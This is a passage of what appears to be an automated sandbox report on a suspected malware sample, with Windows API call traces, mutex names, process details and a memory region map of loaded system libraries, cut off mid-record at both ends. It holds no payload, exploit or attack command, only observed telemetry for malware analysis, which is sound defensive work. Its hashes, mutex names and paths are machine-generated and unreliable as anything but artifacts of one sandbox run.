0x7ffc5ecfd6e0 [0114.341] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0114.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0114.341] GetLastError () returned 0x0 [0114.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0114.341] CloseHandle (hObject=0x17c) returned 1 [0114.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0114.341] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0114.342] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0114.342] GetLastError () returned 0xb7 [0114.342] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0114.342] CloseHandle (hObject=0x17c) returned 1 [0114.342] ExitProcess (uExitCode=0x1) [0114.343] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fc2f0 | out: hHeap=0x4f0000) returned 1 [0114.343] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505ae0 | out: hHeap=0x4f0000) returned 1 [0114.344] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0114.344] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0114.345] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0114.345] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0114.345] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0114.345] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0114.346] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5070c0 | out: hHeap=0x4f0000) returned 1 [0114.346] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0114.346] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0114.346] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 23 os_tid = 0x126c Process: id = "7" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x202a3000" os_pid = "0x1268" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 640 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 641 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 642 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 643 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 644 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 645 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 646 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 647 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 650 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 651 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 652 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 653 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 654 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 655 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 656 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 657 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 658 start_va = 0x580000 end_va = 0x63dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 659 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 660 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 661 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 662 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 663 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 664 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 665 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 666 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 667 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 668 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 669 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 670 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 671 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 672 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 673 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 674 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 675 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 676 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 677 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 679 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 680 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 681 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 682 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 683 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 684 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 685 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 686 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 687 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 688 start_va = 0x1e60000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x1e80da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 689 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 690 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 693 start_va = 0x1f60000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 694 start_va = 0x2160000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 696 start_va = 0x2560000 end_va = 0x2d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 698 start_va = 0x2d60000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 1244 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 1256 start_va = 0x3d30000 end_va = 0x4066fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1301 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1302 start_va = 0x4070000 end_va = 0x4300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1317 start_va = 0x4070000 end_va = 0x41b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1320 start_va = 0x4070000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1393 start_va = 0x4070000 end_va = 0x55fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1994 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1995 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1996 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1997 start_va = 0x4070000 end_va = 0x4234fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1998 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1999 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2000 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2005 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2006 start_va = 0x4070000 end_va = 0x41c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 2020 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 24 os_tid = 0x530 [0092.771] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.771] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0092.772] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.772] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0092.772] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0092.772] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.773] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0092.773] GetProcessHeap () returned 0x480000 [0092.773] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.773] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0092.773] GetLastError () returned 0x7e [0092.773] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0092.773] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0092.774] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c8) returned 0x48c300 [0092.774] SetLastError (dwErrCode=0x7e) [0092.774] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1200) returned 0x493450 [0092.776] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0092.776] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0092.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0092.776] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0092.776] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer" [0092.776] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer" [0092.776] GetACP () returned 0x4e4 [0092.777] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x228) returned 0x485360 [0092.777] IsValidCodePage (CodePage=0x4e4) returned 1 [0092.777] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0092.777] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0092.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0092.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0092.777] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0092.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0092.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0092.777] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.777] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0092.777] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0092.777] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0092.777] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ 